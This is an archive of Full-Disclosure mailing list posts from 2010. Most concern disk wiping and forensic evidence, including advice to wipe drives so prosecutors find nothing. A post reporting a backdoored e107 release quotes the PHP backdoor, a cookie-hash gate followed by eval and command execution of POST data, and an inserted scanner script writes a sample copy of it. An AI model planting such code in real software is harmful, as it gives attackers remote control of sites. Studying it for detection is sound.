Re: [Full-disclosure] Disk wiping -- An alternate approach?
I've resisted getting involved in this and suspect that this may be a misguided attempt to clarify (??) a few things, but...

Bipin Gautam wrote:

> Before: "From the prosecutor's perspective, everything your hard drive is yours"
>
> I just proved : everything your hard drive is NOT NECESSARILY YOURS.

This need not matter. In several (many, most and increasing) Western jurisdictions _just possessing_ certain kinds of material is a criminal offense. This is typically child pornography and/or bestiality but often includes other more or less specific things. For example, writing as I am from New Zealand right now, I would almost certainly be committing an indecency offense by including the words "golden" and "shower" run together into a single phrase in this Email. Within such jurisdictions, the issues of "knowledgeable possession" or "intent to possess" are technically irrelevant to the issue of "did you breach this law", for as written, the offence is "possession" (and/or production, etc, etc) with no elaboration.

> DOES THAT CHANGE ANYTHING? LOGIC MAYBE???

I guess to assess that, we have to first decide whether you know what you're talking about or not... And have you not heard of "the Trojan Horse defense"? Kinda the legal opposite of "the dog ate my homework" and already successfully used a few times.

Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
No, look: wear-levelling and error correction... http://en.wikipedia.org/wiki/Flash_memory
Re: [Full-disclosure] Disk wiping -- An alternate approach?
2010/1/26 Tracy Reed (short extract):

> Executive summary: Data overwritten once is unrecoverable on any drive made in the last 10 years. So do a single write pass from /dev/random on working drives.

Thanks for all this information. By the way, does somebody know about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable?
Re: [Full-disclosure] Disk wiping -- An alternate approach?
On Tue, Jan 26, 2010 at 04:26:08AM +0100, E. Prom spake thusly:

> The point is that they never get a hard-drive full of zeroes or random numbers, but a hard-drive that has pieces of other data under the zeroes or random numbers. That's why programs like "wipe" fill more than 20 times the hard-drive with data. But filling 20 times a whole disk can be very, very long, especially if it's a 2TB USB drive. A "quick" wipe filling a drive only 4 times, is often enough, but...

Fortunately, so many rewrites are not necessary and have not been for a long time. I destroy drives containing credit card and other personal data with just one wipe (assuming the drive is operational) and if not I drill a few holes in it.

While investigating how to best destroy such data I happened across some postings with some actual experimental results from trying to recover overwritten data:

http://blogs.sans.org/computer-forensics/2009/01/15/overwriting-hard-drive-data/

And some analysis of modern techniques for recovering data and their effectiveness:

https://blogs.sans.org/computer-forensics/2009/01/28/spin-stand-microscopy-of-hard-disk-data/

Executive summary: Data overwritten once is unrecoverable on any drive made in the last 10 years. So do a single write pass from /dev/random on working drives. For non-functional drives or where overwriting is not possible drilling holes is very sufficient for any business and personal data. For top secret data wanted by an enemy with millions to spend, and you cannot overwrite the data just once, then recovery via Spin Stand Microscopy from undamaged areas of the platter is possible at great expense and weeks of constant work. Shattering the platter makes this technique much harder, rendering perhaps 80% of the data unrecoverable. You are still best off with a cheap one time write of the whole drive.

And as far as data recovery from failed drives goes this is rather amusing:

http://blogs.sans.org/computer-forensics/2009/09/30/the-failed-hard-drive-the-toaster-oven-and-a-little-faith/

--
Tracy Reed
http://tracyreed.org
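The single random-data pass Tracy describes, written as a small shell script with a check afterwards. This is an added example, not code from the thread or from any of the tools it mentions. It assumes coreutils (dd, head, tr, wc), a grep that accepts -a, and a target path passed explicitly; for a real drive it must run as root against the whole-device node, where the size comes from `blockdev --getsize64` (Linux only). The marker search at the end is the same kind of keyword sweep E. Prom describes an examiner doing, so it doubles as a spot check that the pass actually reached the data.

```shell
#!/bin/sh
# Added example (not from the thread): one in-place overwrite pass of a
# block device or disk image with random data, followed by a spot check
# that a known plaintext marker is gone and that the pass wrote random
# bytes rather than nothing at all.
#
# Assumptions: coreutils dd/head/tr/wc, grep -a, an explicit target path.
# Block devices use blockdev --getsize64 (Linux); regular files use wc.

# Size of the target in bytes.
target_size() {
    if [ -b "$1" ]; then
        blockdev --getsize64 "$1"
    else
        wc -c < "$1" | tr -d ' '
    fi
}

# One pass of /dev/urandom written in place (conv=notrunc) so the same
# logical blocks are overwritten.  Truncating and recreating a file would
# allocate fresh blocks and leave the old contents where they were.
wipe_once() {
    target="$1"
    size=$(target_size "$target")
    blocks=$(( (size + 4095) / 4096 ))
    dd if=/dev/urandom bs=4096 count="$blocks" 2>/dev/null \
        | head -c "$size" \
        | dd of="$target" bs=4096 conv=notrunc 2>/dev/null
}

# Spot check after the pass: the marker must not be findable any more,
# and the target must not be all zero bytes (which would mean the write
# never happened).  Returns 0 when both checks pass.
verify_wiped() {
    target="$1"
    marker="$2"
    if grep -aq -- "$marker" "$target"; then
        echo "marker still present in $target" >&2
        return 1
    fi
    nonzero=$(tr -d '\000' < "$target" | wc -c | tr -d ' ')
    if [ "$nonzero" -eq 0 ]; then
        echo "$target is all zeros; overwrite did not happen" >&2
        return 1
    fi
    return 0
}

# Usage (root, real device):  wipe_once /dev/sdX && verify_wiped /dev/sdX 'some known string'
```

The check is only a spot check, not proof of sanitisation: as the earlier reply about wear-levelling points out, a USB key or SSD can remap cells so that a pass through the block layer never touches the old copy, and this script can only see what the device chooses to return.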
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, this is the best I can explain to you all. So it looks like sometimes just browsing online is as bad/good as Getting Infected from a Plausible deniability perspective? How is it any different? :)
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Could DIGITAL FORENSICS be fundamentally FLAWED (and they don't explain more?)

Think: http://en.wikipedia.org/wiki/Chain_of_custody

Main Point: The keywords and texts found in a suspect's harddisk are by NO guarantee belonging to the OWNER OF THE COMPUTER; instead it could be leftover chunks from the internet written by someone that land on your computer's disk as fragments, found dormant in your free-space as browser cache is flushed? On top of that FAT32/NTFS fs has a higher fragmentation rate than EXT*.

The problem is: "Possession is 9/10ths of the law" -- but ANY texts they find, if questionable, can also very likely come from the internet while you browse online and NOT your own possession, and someone typed it from online, a webpage you viewed etc, and it lands on your disk while you browse it and is left as fragments? How does the law see such a situation? (and except the possibility of linguistic analysis to prove guilty)
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Yep, that's precisely what I was trying to get across. If the data is on your machine, it's presumed to be yours unless you can prove that there's cause to believe that someone else put it there. This dovetails nicely with what I was saying above, i.e. the prosecutor is out to convict you. He or she is going to use whatever data he or she can find in order to do that. The solution to this is not to plant more incriminating data, but to wipe out as much data as possible, giving the prosecutor no hooks to hang a case on.

--Rohit Patnaik

On Mon, Jan 25, 2010 at 10:27 PM, Thor (Hammer of God) wrote:

> It depends on what you define "plausible deniability" as. Sometimes it just doesn't matter. At an industry event here in Seattle, a guy working for the state prosecutors office was speaking on this very subject - that of forensic collection of data on a system and the "presumption" of guilt.
>
> I posed the question of "how do you know that the data actually originated from actions of the user as opposed to someone who could have been using the system for their own means, or someone trying to plant false data? How do you prevent one from impugning your findings?"
>
> He said, "Well, we're not stupid." I'm serious. I was extremely disappointed in that answer, and it basically said, "it doesn't really matter what we find on the system- we're not stupid, and if the data is there, it means you did it." I was appalled.
>
> All you have is "deniability." This method doesn't make it "plausible" to anyone but you, which doesn't matter. If you want any level of meaningful "plausible deniability" then leave your wireless open and have your system riddled with bots.
>
> t
>
> > -Original Message-
> > From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Bipin Gautam
> > Sent: Monday, January 25, 2010 7:42 PM
> > To: E. Prom
> > Cc: full-disclosure
> > Subject: Re: [Full-disclosure] Disk wiping -- An alternate approach?
> >
> > ok, this all adds nothing but another layer of plausible deniability to ANY data found in your computer
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Well, if it's not yours, Bipin, how did it get onto your drive? Was your computer hacked?

-- Rohit Patnaik

On Mon, Jan 25, 2010 at 10:25 PM, Bipin Gautam wrote:

> Rohitji,
>
> Before: "From the prosecutor's perspective, everything your hard drive is yours"
>
> I just proved : everything your hard drive is NOT NECESSARILY YOURS.
>
> DOES THAT CHANGE ANYTHING? LOGIC MAYBE???
Re: [Full-disclosure] Disk wiping -- An alternate approach?
It depends on what you define "plausible deniability" as. Sometimes it just doesn't matter. At an industry event here in Seattle, a guy working for the state prosecutors office was speaking on this very subject - that of forensic collection of data on a system and the "presumption" of guilt.

I posed the question of "how do you know that the data actually originated from actions of the user as opposed to someone who could have been using the system for their own means, or someone trying to plant false data? How do you prevent one from impugning your findings?"

He said, "Well, we're not stupid." I'm serious. I was extremely disappointed in that answer, and it basically said, "it doesn't really matter what we find on the system- we're not stupid, and if the data is there, it means you did it." I was appalled.

All you have is "deniability." This method doesn't make it "plausible" to anyone but you, which doesn't matter. If you want any level of meaningful "plausible deniability" then leave your wireless open and have your system riddled with bots.

t

> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Bipin Gautam
> Sent: Monday, January 25, 2010 7:42 PM
> To: E. Prom
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Disk wiping -- An alternate approach?
>
> ok, this all adds nothing but another layer of plausible deniability to ANY data found in your computer
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Rohitji,

Before: "From the prosecutor's perspective, everything your hard drive is yours"

I just proved : everything your hard drive is NOT NECESSARILY YOURS.

DOES THAT CHANGE ANYTHING? LOGIC MAYBE???
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Sorry for the double post, but I forgot to add this to my last message:

From the prosecutor's perspective, everything on your hard drive is yours. It doesn't matter whether it was part of the original data that was on the drive or whether it came from a data set used to overwrite the original data. You possess it, so it's yours.

--Rohit Patnaik

On Mon, Jan 25, 2010 at 9:31 PM, Bipin Gautam wrote:

> So to the point, the techniques of forensic examiners were flawed from day one given that any text/evidence found on your computer is NOT NECESSARILY yours! Does that break digital forensics?
> oops.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
It depends entirely on how you define "flawed". As I stated earlier, the goal of the prosecutor is not some abstract ideal of justice. It is a conviction. Anything they can do within the law to convict you is fair game. Using statements that you put on your hard drive certainly falls under those rules, regardless of what the original intent was.

-- Rohit Patnaik

On Mon, Jan 25, 2010 at 9:31 PM, Bipin Gautam wrote:

> So to the point, the techniques of forensic examiners were flawed from day one given that any text/evidence found on your computer is NOT NECESSARILY yours! Does that break digital forensics?
> oops.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
ok, this all adds nothing but another layer of plausible deniability to ANY data found in your computer
Re: [Full-disclosure] Disk wiping -- An alternate approach?
2010/1/26 Rohit Patnaik :

> A few phrases and "surprising" patterns are a lot more suspicious than a hard drive full of zeroes, especially if there's evidence that other data has been overwritten or erased. If you present a hard drive full of zeroes or random numbers, there's nothing to charge you with. If most of your data is random gibberish but there are a few telling phrases here and there, then there might be enough for the prosecution to bring charges, even if they aren't able to get a conviction.
> [snip]

The point is that they never get a hard-drive full of zeroes or random numbers, but a hard-drive that has pieces of other data under the zeroes or random numbers. That's why programs like "wipe" fill more than 20 times the hard-drive with data. But filling 20 times a whole disk can be very, very long, especially if it's a 2TB USB drive. A "quick" wipe filling a drive only 4 times, is often enough, but...

If the police or spies look for determined words or sentences (presumed not encrypted), at an unknown point on an unknown layer of the disk, it will be much easier for them to find it if the rest was random data (or video or whatever) than if it was random text that can have a meaning when looking with a program, but not in front of a Court.

I don't find Bipin's idea so bad, but I'm not sure it adds significant security.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
So to the point, the techniques of forensic examiners were flawed from day one given that any text/evidence found on your computer is NOT NECESSARILY yours! Does that break digital forensics?

oops.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
A few phrases and "surprising" patterns are a lot more suspicious than a hard drive full of zeroes, especially if there's evidence that other data has been overwritten or erased. If you present a hard drive full of zeroes or random numbers, there's nothing to charge you with. If most of your data is random gibberish but there are a few telling phrases here and there, then there might be enough for the prosecution to bring charges, even if they aren't able to get a conviction.

Remember, "innocent until proven guilty" is nice in theory, but not so nice in practice. While you're under investigation, the prosecution can do many things to disrupt your business and personal life. The best thing to do if there's any question is to simply clam up and sit still until you get to speak with a lawyer.

Remember, prosecutors are judged on their conviction rate, not on their accuracy rate. They have no incentive to look for exonerating evidence - that's your responsibility. They'll only look for evidence that'll prove you guilty. As such, it's best to leave nothing at all that would arouse suspicion, especially if you've done nothing wrong in the first place.

--Rohit Patnaik

On Mon, Jan 25, 2010 at 11:22 AM, Bipin Gautam wrote:

> Ok, i extract wikipedia in my computer... then later delete the html... @hdd level the place is marked freespace. then i copy a few videos, write a few emails and by then if most of the things get deleted and by bad luck if any such content is left unoverwritten partially producing "questionable" and "surprising" patterns UNKNOWINGLY of just a few phrases, then basically someone is screwed just like that, even without GUILT ?!
>
> So, copying dictionary, webpages, encyclopaedia, research paper etc in your computer can really be harmful sometimes !!!?
>
> Anything on the internet if its a webpage can land on anyone's computer while browsing, searching online, following links and with a lot of coincidences etc AND NOT NECESSARILY whatever text chunks found in your hdd is content OF YOUR OWN. YOU READ TO BLOGS OF PEOPLE, VISIT FORUMS, joke around in FD etc... (get the idea) and it can be saved in disk cache and IF be leftover in disk as broken chunks of texts you are screwed ? How does law see all that.
>
> So, if a "questionable" content is found it doesn't mean the laptop owner is responsible for it. We even keep on skipping text while reading in forums online and anyone can say anything online and it can land in your hdd as TROJAN HORSE of OPINIONS to screw you later in life !!!?
>
> Think about it?
>
> Maybe then Alice/chatterbox run through the free/slack/etc... space of your harddisk idea is better?
>
> It would be intellectual uphill challenge for the EXAMINERS given that someone may have to shift 1 terabyte of data (how many bytes?:) mostly by HUMAN RESOURCE in hope for a ___ in the haystack..
>
> btw, how many BOOKS is that? :P
> -bipin
>
> [1] http://alice.pandorabots.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
Some people think or assume that MS lays eggs daily. As if the security team at MS stayed leg over the other waiting for some bug to crop up some day.

On Mon, Jan 25, 2010 at 11:11 PM, wrote:

> On Mon, 25 Jan 2010 20:03:03 -0200, Rafael Moraes said:
>
> > This is a subject that need to be discussed very carefully. I agree, It should be "controlled", but, how far?
>
> In particular, one must be *very* careful to not create unintended consequences. For instance, in general the more regulated an industry is, the more risk-adverse the companies get - both because regulation implies "don't rock the boat" and the second-order effects of compliance paperwork and similar issues. Look at the mountains of paperwork needed to get the FAA to type-certify a new airplane as airworthy - what if Microsoft had to do that level of detail for Windows 8, the next release of Exchange, and the next release of Office?
>
> How do you make Microsoft "regulated" in any meaningful sense, and still allow them the ability to ship an out-of-cycle patch?
Re: [Full-disclosure] e107 latest download link is backdoored
Don't know the date at your place, but it's 25th Jan here, not 22nd. ;)

On Mon, Jan 25, 2010 at 10:36 PM, Michael Holstein < michael.holst...@csuohio.edu> wrote:

> > Speaking of silent fixes...
>
> Silent? .. it's right on the "news" section of the e107.org front page. To wit :
>
> [http://e107.org]
>
> **SECURITY UPDATE** 0.7.17
>
> We were recently informed of a very nasty exploit that, as far as we can see, affects almost all e107 0.7 releases. Everyone running e107 needs to get their sites updated as soon as possible. If you are a site owner and you are unable to upgrade for some reason (too much hacked core code), please contact me directly and I can help you with a quick-fix.
>
> Please get the word out to all other e107ers. If you find an e107 site out there, post on their site somewhere about this upgrade.
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
On Mon, 25 Jan 2010 20:03:03 -0200, Rafael Moraes said:

> This is a subject that need to be discussed very carefully. I agree, It should be "controlled", but, how far?

In particular, one must be *very* careful to not create unintended consequences. For instance, in general the more regulated an industry is, the more risk-adverse the companies get - both because regulation implies "don't rock the boat" and the second-order effects of compliance paperwork and similar issues. Look at the mountains of paperwork needed to get the FAA to type-certify a new airplane as airworthy - what if Microsoft had to do that level of detail for Windows 8, the next release of Exchange, and the next release of Office?

How do you make Microsoft "regulated" in any meaningful sense, and still allow them the ability to ship an out-of-cycle patch?
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
This is a subject that needs to be discussed very carefully. I agree, It should be "controlled", but, how far?

Rafael Moraes
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
This is a subject that needs to be discussed very carefully. I agree, It should be "controlled", but, how far?

2010/1/25 omg wtf

> -100
>
> We need more responsible IT departments.
>
> On Sun, Jan 24, 2010 at 1:29 PM, Bipin Gautam wrote:
>
> > +1
> >
> > WE NEED MORE DISCUSSION ON THIS!!!
> >
> > -bipin

--
Att,
Rafael Moraes
Linux Professional Institute Certified - Level 1
ITIL Foundations Certified
Re: [Full-disclosure] e107 latest download link is backdoored
> Speaking of silent fixes...

Silent? .. it's right on the "news" section of the e107.org front page. To wit :

[http://e107.org]

**SECURITY UPDATE** 0.7.17

We were recently informed of a very nasty exploit that, as far as we can see, affects almost all e107 0.7 releases. Everyone running e107 needs to get their sites updated as soon as possible. If you are a site owner and you are unable to upgrade for some reason (too much hacked core code), please contact me directly and I can help you with a quick-fix.

Please get the word out to all other e107ers. If you find an e107 site out there, post on their site somewhere about this upgrade.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
On Mon, 25 Jan 2010 23:44:23 +0545, Bipin Gautam said:

> Ok, then why not encode the same keywords that these TOOLS look for with your Markov chains idea and mix it to wipe a 1 TB hdd with alice chatter-bot idea ?
>
> Again this is all theory :P

You still haven't explained how this has any advantages over using an encrypted filesystem and wiping space with all-zeros.
Re: [Full-disclosure] e107 latest download link is backdoored
Speaking of silent fixes...

On Mon, Jan 25, 2010 at 7:48 PM, Chris Travers wrote:

> On Mon, Jan 25, 2010 at 2:58 AM, Bogdan Calin wrote:
>
> > Hi guys,
> >
> > The latest version of e107, version 0.7.17 contains a PHP backdoor.
> > http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip
>
> Looks like the e107 team has removed this file, and reviewing the code in the cvs repository this code does not appear there.
>
> Best Wishes,
> Chris Travers
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
-100

We need more responsible IT departments.

On Sun, Jan 24, 2010 at 1:29 PM, Bipin Gautam wrote:

> +1
>
> WE NEED MORE DISCUSSION ON THIS!!!
>
> -bipin
Re: [Full-disclosure] IE 8 remote code execution exploit to sell
Admiral Ackbar just called me a few minutes ago about this one too!

On Sun, Jan 24, 2010 at 4:52 PM, Orn Roswell wrote:

> Hello,
>
> I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.
>
> Regards,
>
> [ORN ROSWELL]
Re: [Full-disclosure] Question about IPTV pentestng - packet manipulation for subscribing charged content
> I wanna edit this file name. (a1d1.mpg is free, a1d2.mpg not free)

If this is all that needs to be done, why not use a transparent proxy (on the bridge) :

http://www.faqs.org/docs/Linux-mini/TransparentProxy.html

and just use rewrite rules :

http://www.squid-cache.org/Doc/config/rewrite/

Cheers,

Michael Holstein
Cleveland State University
[Full-disclosure] DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability
Title
-----
DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability

Severity
--------
Medium

Date Discovered
---------------
November 19, 2009

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Rob Kraus, Chris Graham and r...@b13$

Vulnerability Description
-------------------------
The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL Injection. Exploitation of the vulnerability may allow attackers to bypass authentication and access sensitive information stored on the device.

Solution Description
--------------------
A patch is not available at this time. Possible workarounds include disabling the vulnerable service, or limiting access to a set of trusted IP addresses.

Tested Systems / Software
-------------------------
F2L-3000 version 4.0.0 is the only platform that has been manually tested. Earlier versions and other, similar models may also be vulnerable as the platform is sold in various configurations.

Vendor Contact
--------------
Vendor Website: http://www.files2links.com/
Re: [Full-disclosure] e107 latest download link is backdoored
On Mon, Jan 25, 2010 at 2:58 AM, Bogdan Calin wrote:

> Hi guys,
>
> The latest version of e107, version 0.7.17 contains a PHP backdoor.
> http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

Looks like the e107 team has removed this file, and reviewing the code in the cvs repository this code does not appear there.

Best Wishes,
Chris Travers
Re: [Full-disclosure] e107 latest download link is backdoored
I've just checked the archive. The latest version of the file class2.php was changed on 2010/01/21 03:57:43 and it does not contain the malicious code. It has been probably replaced already, or we are using different mirrors.

Valery Marchuk
www.SecurityLab.ru

- Original Message -
From: "Bogdan Calin"
To:
Cc:
Sent: Monday, January 25, 2010 12:58 PM
Subject: e107 latest download link is backdoored

> Hi guys,
>
> The latest version of e107, version 0.7.17 contains a PHP backdoor.
> http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip
>
> I've just downloaded this file and while looking through the code, I've found the following piece of code:
>
> file: class2.php, line: 1876
>
> if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
>
> ...
>
> if(!empty($_POST['cmd'])){
>     $out = execute($_POST['cmd']);
> }
>
> elseif(!empty($_POST['php'])){
>     ob_start();
>     eval($_POST['php']);
>     $out = ob_get_contents();
>     ob_end_clean();
> }
>
> ...
>
> and so on.
>
> I've informed the e107 guys about this situation.
> For now, that link is not safe.
>
> Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26
>
> --
> Bogdan Calin - bog...@acunetix.com
> CTO
> Acunetix Ltd. - http://www.acunetix.com
> Acunetix Web Security Blog - http://www.acunetix.com/blog
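The fragment Bogdan quotes has a recognisable shape: a hidden gate keyed on a hashed cookie value, followed by eval() or command execution of POST data. The script below, an added example that is not from the thread or the e107 project, greps an unpacked download for exactly those constructs so a site owner can check an archive before deploying it, which is the kind of review that would have caught the modified class2.php. It assumes a grep that supports -r, -E and --include (GNU or BSD), and its patterns are this example's own heuristics, not a complete web-shell signature set.

```shell
#!/bin/sh
# Added example (not from the thread or e107): scan a tree of PHP files
# for the backdoor constructs quoted above and print file:line hits.
#
# Assumptions: grep with -r/-E/--include; the regexes below are this
# example's own heuristics for the constructs in the quoted class2.php:
#   md5($_COOKIE[...]) == "<32 hex>"        hidden authentication gate
#   eval($_POST[...]) and friends           code execution from a request
#   execute|system|exec|...($_POST[...])    command passthrough
BACKDOOR_RE='md5\(\$_COOKIE\[[^]]*\]\) *== *"[0-9a-f]{32}"|eval\(\$_(POST|GET|REQUEST|COOKIE)\[|(execute|system|exec|shell_exec|passthru)\(\$_(POST|GET|REQUEST)\['

# Print "path:line:text" for every hit under the given directory.
# Always returns 0 so callers under "set -e" can treat "no hits" as fine.
scan_php_tree() {
    grep -rnE --include='*.php' -- "$BACKDOOR_RE" "$1" 2>/dev/null
    return 0
}

# Number of hits, for scripts that want a pass/fail gate.
count_php_hits() {
    scan_php_tree "$1" | wc -l | tr -d ' '
}

# Build a throwaway tree with a constructed copy of the quoted fragment
# and one clean file, so the scanner can be exercised offline.
# Prints the directory path.
make_sample_tree() {
    dir=$(mktemp -d)
    cat > "$dir/class2.php" <<'EOF'
<?php
// constructed sample: mirrors the fragment quoted in the thread
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
    if(!empty($_POST['cmd'])){
        $out = execute($_POST['cmd']);
    }
    elseif(!empty($_POST['php'])){
        ob_start();
        eval($_POST['php']);
        $out = ob_get_contents();
        ob_end_clean();
    }
}
EOF
    cat > "$dir/clean.php" <<'EOF'
<?php
// constructed sample: ordinary request handling, should not match
$title = htmlspecialchars($_POST['title'], ENT_QUOTES);
echo $title;
EOF
    echo "$dir"
}

# Usage against an unpacked download:  scan_php_tree ./e107_v0.7.17_full
```

Pattern hits are a prompt for review, not a verdict: a legitimate admin tool may call exec() on request data, and a real backdoor can be obfuscated past these regexes, which is why Valery's approach of comparing the shipped file against the project's own repository copy is the stronger check when a repository is available.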
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, thanks Michael ! I call off all the theories, except:

As you told "Possession is 9/10ths of the law" BUT the texts they find can very likely come from the internet while you browse the internet and not your own possession and someone typed it from online and it lands on your disk while you browse it? DON'T MISS THIS MAIN POINT! How does the law see such a situation? (and except the possibility of linguistic analysis to prove guilty)
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> You are telling me "Modern forensic" examiners DRAW CONCLUSIONS
> without look it ALL possible evidence and by shifting just a few bytes
> of possible "related keywords" and draw insufficient conclusions?

No, they find the keyword in a file (or fragment thereof) and examine the resulting file or reconstruct the fragments to see if it's relevant to their investigation. Putting YOUR bomb plot amidst thousands of news articles about OTHER bomb plots won't fool them, and it'll make you look sufficiently guilty that you'll sit in jail while they waste their time.

> it like, when an forensic incident happens you take fingerprint from
> the whole house skipping a few rooms thinking there are so many
> rooms to look for.?

Depends on what they're trying to prove. In a burglary case, they might see prints on the stereo cabinet and lift those. No need to fingerprint the entire house when they've got a clear print, although they usually grab a few others just to be sure.

Apparently you've never sat through a trial .. find an interesting case and go attend, it's highly educational. Basically a jury is 12 people of the general population (in actuality, an in-depth knowledge of the subject matter at hand is likely to get you dismissed as a juror by one or both sides). The jury, having watched CSI and such will listen with utter fascination at the State's expert in computer forensics talk about how he extracted the data and it will paint a VERY convincing picture for 12 people that know nothing about computers.

> On top of that, the keywords they fish-out that way is by no guarantee
> belonging to the OWNER OF THE COMPUTER instead as leftover chunks from
> the internet written by someone and lands on your computer's in
> disk-fragments as free-space as browser cache is flushed ?

Possession is 9/10ths of the law. You can try and float your "wikipedia did it" theory at trial, but ultimately it's a matter of which theory sounds more plausible to the jury:

1. defendant had illegal stuff on his computer.
2. defendant says illegal stuff on his computer was an effort to hide any potential illegal stuff by putting articles about related illegal stuff he didn't do on there.

Quit trying to re-invent the wheel and get your crypto on and lawyer up when asked about it.

Cheers,

Michael Holstein
Cleveland State University
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> Ok, then why not encode the same keywords that these TOOLS look for
> with your Markov chains idea and mix it to wipe a 1 TB hdd with alice
> chatter-bot idea ?

How do you know what they'd search for, and if you did, why would you want to fill your drive with a bunch of related information? Modern forensic tools are good enough to find your "needle" in that "haystack" in short order, regardless of how well you try to hide it in plain sight among the contents of wikipedia, et.al.

If you truly desire to "hide in plain sight", consider Steganography [*1*]. If you want to create "plausible deniability", consider TrueCrypt's hidden volumes [*2*].

[*1*]: http://en.wikipedia.org/wiki/Steganography
[*2*]: http://www.truecrypt.org/docs/plausible-deniability

Regards,

Michael Holstein
Cleveland State University
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, I know the "obvious things" Michael!

> Modern forensic tools are good enough to find your "needle" in that
> "haystack" in short order, regardless of how well you try to hide it
> in plain sight among the contents of wikipedia, et.al.

You are telling me "Modern forensic" examiners DRAW CONCLUSIONS without looking at ALL possible evidence, and by sifting just a few bytes of possible "related keywords" draw insufficient conclusions?

Isn't it like, when a forensic incident happens, you take fingerprints from the whole house skipping a few rooms, thinking there are so many rooms to look for?

On top of that, the keywords they fish out that way are by no guarantee belonging to the OWNER OF THE COMPUTER; instead they are leftover chunks from the internet written by someone that land on your computer in disk fragments as free space as the browser cache is flushed? Don't miss the main point!

On top of that, FAT32/NTFS fs has a higher fragmentation rate than EXT*.
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, then why not encode the same keywords that these TOOLS look for with your Markov chains idea and mix it to wipe a 1 TB hdd with alice chatter-bot idea?

Again this is all theory :P

On 1/25/10, valdis.kletni...@vt.edu wrote:
> On Mon, 25 Jan 2010 23:07:57 +0545, Bipin Gautam said:
>
>> It would be intellectual uphill challenge for the EXAMINERS given that
>> someone may have to shift 1 terabyte of data (how many bytes?:) mostly
>> by HUMAN RESOURCE in hope for a ___ in the haystack..
>
> You *do* realize that there exist numerous tools to automate this scanning,
> so "human resource" means "select the search terms, hit enter, and check back
> after lunch".
>
> http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
> http://www.guidancesoftware.com/computer-forensics-fraud-investigation-software.htm
>
> That's the sort of stuff your disk will most likely be hit with. The state
> of the art is stuff like "find all erased e-mail from X to Y regarding the
> McClellan situation".
Re: [Full-disclosure] Disk wiping -- An alternate approach?
On Mon, 25 Jan 2010 23:07:57 +0545, Bipin Gautam said:

> It would be intellectual uphill challenge for the EXAMINERS given that
> someone may have to shift 1 terabyte of data (how many bytes?:) mostly
> by HUMAN RESOURCE in hope for a ___ in the haystack..

You *do* realize that there exist numerous tools to automate this scanning, so "human resource" means "select the search terms, hit enter, and check back after lunch".

http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
http://www.guidancesoftware.com/computer-forensics-fraud-investigation-software.htm

That's the sort of stuff your disk will most likely be hit with. The state of the art is stuff like "find all erased e-mail from X to Y regarding the McClellan situation".
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, I extract wikipedia on my computer... then later delete the html... at hdd level the place is marked freespace. Then I copy a few videos, write a few emails, and by then if most of the things get deleted and by bad luck if any such content is left unoverwritten, partially producing "questionable" and "surprising" patterns UNKNOWINGLY of just a few phrases, then basically someone is screwed just like that, even without GUILT?!

So, copying dictionary, webpages, encyclopaedia, research paper etc. on your computer can really be harmful sometimes!!!?

Anything on the internet, if it's a webpage, can land on anyone's computer while browsing, searching online, following links and with a lot of coincidences etc. AND NOT NECESSARILY whatever text chunks found in your hdd is content OF YOUR OWN. YOU READ BLOGS OF PEOPLE, VISIT FORUMS, joke around in FD etc... (get the idea) and it can be saved in disk cache and IF left over in disk as broken chunks of texts you are screwed? How does law see all that.

So, if a "questionable" content is found it doesn't mean the laptop owner is responsible for it. We even keep on skipping text while reading in forums online and anyone can say anything online and it can land in your hdd as TROJAN HORSE of OPINIONS to screw you later in life!!!? Think about it?

Maybe then Alice/chatterbox run through the free/slack/etc... space of your harddisk idea is better? It would be an intellectual uphill challenge for the EXAMINERS given that someone may have to sift 1 terabyte of data (how many bytes?:) mostly by HUMAN RESOURCE in hope for a ___ in the haystack.. btw, how many BOOKS is that? :P

-bipin

[1] http://alice.pandorabots.com/
[Full-disclosure] [ MDVSA-2010:025 ] php-pear-Mail
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
